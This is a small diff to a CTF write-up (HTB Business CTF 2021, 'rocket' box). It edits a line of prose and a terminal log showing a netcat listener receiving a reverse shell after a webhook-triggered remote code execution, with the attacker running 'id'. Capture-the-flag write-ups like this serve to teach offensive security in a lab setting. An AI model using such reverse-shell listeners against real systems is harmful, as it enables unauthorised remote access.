synacktiv/CTF-Write-ups/HTB-Business-CTF-2021/rocket.md

 ![RCE with the web hook](img/rce_admin.png "RCE with the web hook")

-When hitting the Webhook URL the revshell is connecting back to us:
+When hitting the Webhook URL(see screen above) the revshell is connecting back to us:

 ```
-Tue Jul 27 00:41:51 wil@pwn:~/htb/business_ctf/boxes$ nc -nvlp 80
+$ nc -nvlp 80
 Listening on [0.0.0.0] (family 2, port 80)
 Connection from 10.129.1.7 50358 received!
 id